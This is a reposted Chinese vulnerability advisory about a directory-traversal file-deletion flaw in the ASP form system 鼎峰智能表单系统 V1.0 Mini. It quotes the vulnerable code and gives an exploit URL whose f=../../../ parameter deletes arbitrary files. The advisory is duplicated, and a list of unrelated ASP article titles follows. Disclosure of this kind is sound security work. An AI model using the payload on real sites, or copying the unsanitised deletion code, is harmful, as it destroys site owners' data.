鼎峰智能表单系统(ASP) V1.0 Mini 删文件漏洞
来源:百度文库 编辑:神马文学网 时间:2024/04/25 14:37:03
发布日期:2010-07.06
发布作者:不详
影响版本:鼎峰智能表单系统(ASP) V1.0 Mini
漏洞描述:鼎峰智能表单系统(ASP) V1.0 Mini 跨目录删除文件漏洞
elseif Request.QueryString("action")="del" then 'QueryString传输,不多说 f=Request.QueryString("f") ‘也是QueryString,取得“f”变量 if f<>"" then '判断f是否空字符 Set fso=server.createobject("scripting.filesystemobject") fso.DeleteFile Server.MapPath("./dbbak/"&f) '直接引用了“f” set fso=nothing url_go "删除成功!","db_manage.asp" else url_go "没有找到指定文件!","db_manage.asp" end if 而下面的引用为:
删除
取得变量“f”,而且f变量是处理的真实文件名(item.Name) 就直接引用在 Server.MapPath("./dbbak/"&f)
执行方法:
http://127.0.0.1/diyfrm/manage/db_manage.asp?action=del&f=../../../index.asp
TAG标签: 漏洞 鼎峰智能表单系统 删文件漏洞
本文转自 ☆★ 包罗万象网 ★☆ - http://www.baoluowanxiang.com 转载请注明出处,侵权必究!
原文链接:http://www.baoluowanxiang.com/a/net-offense/loophole/2010/0709/1157.html
发布作者:不详
影响版本:鼎峰智能表单系统(ASP) V1.0 Mini
漏洞描述:鼎峰智能表单系统(ASP) V1.0 Mini 跨目录删除文件漏洞
elseif Request.QueryString("action")="del" then 'QueryString传输,不多说 f=Request.QueryString("f") ‘也是QueryString,取得“f”变量 if f<>"" then '判断f是否空字符 Set fso=server.createobject("scripting.filesystemobject") fso.DeleteFile Server.MapPath("./dbbak/"&f) '直接引用了“f” set fso=nothing url_go "删除成功!","db_manage.asp" else url_go "没有找到指定文件!","db_manage.asp" end if 而下面的引用为:
删除
取得变量“f”,而且f变量是处理的真实文件名(item.Name) 就直接引用在 Server.MapPath("./dbbak/"&f)
执行方法:
http://127.0.0.1/diyfrm/manage/db_manage.asp?action=del&f=../../../index.asp
TAG标签: 漏洞 鼎峰智能表单系统 删文件漏洞
本文转自 ☆★ 包罗万象网 ★☆ - http://www.baoluowanxiang.com 转载请注明出处,侵权必究!
原文链接:http://www.baoluowanxiang.com/a/net-offense/loophole/2010/0709/1157.html
鼎峰智能表单系统(ASP) V1.0 Mini 删文件漏洞
asp取动态表单中数据并写入xml文件
Asp多表单域无组件文件上传的例子
ASP.NET上传控件V1.0 beta2
5.5 ASP漏洞攻击
5.5 ASP漏洞攻击
志远信息管理系统 v1.0
ASP注入应用漏洞解决方法
ASP练习一 表单传送变量
ASP和HTML表单 (ASP and HTML Forms)
联想硬盘保护系统5(用户手册 V1.0)
ASP操作EXCEL文件
ASP操作EXCEL文件
mini
ASP编程入门进阶之二:认识表单
asp取动态表单中数据并写入xml文
智能门禁系统发展趋势
ASP实现文件直接下载
在线文件管理器asp源代码
使用ASP生成HTML文件
巧用ASP生成PDF文件
asp 应用程序成为 exe 文件
ASP实现文件直接下载
ASP中也能解压缩rar文件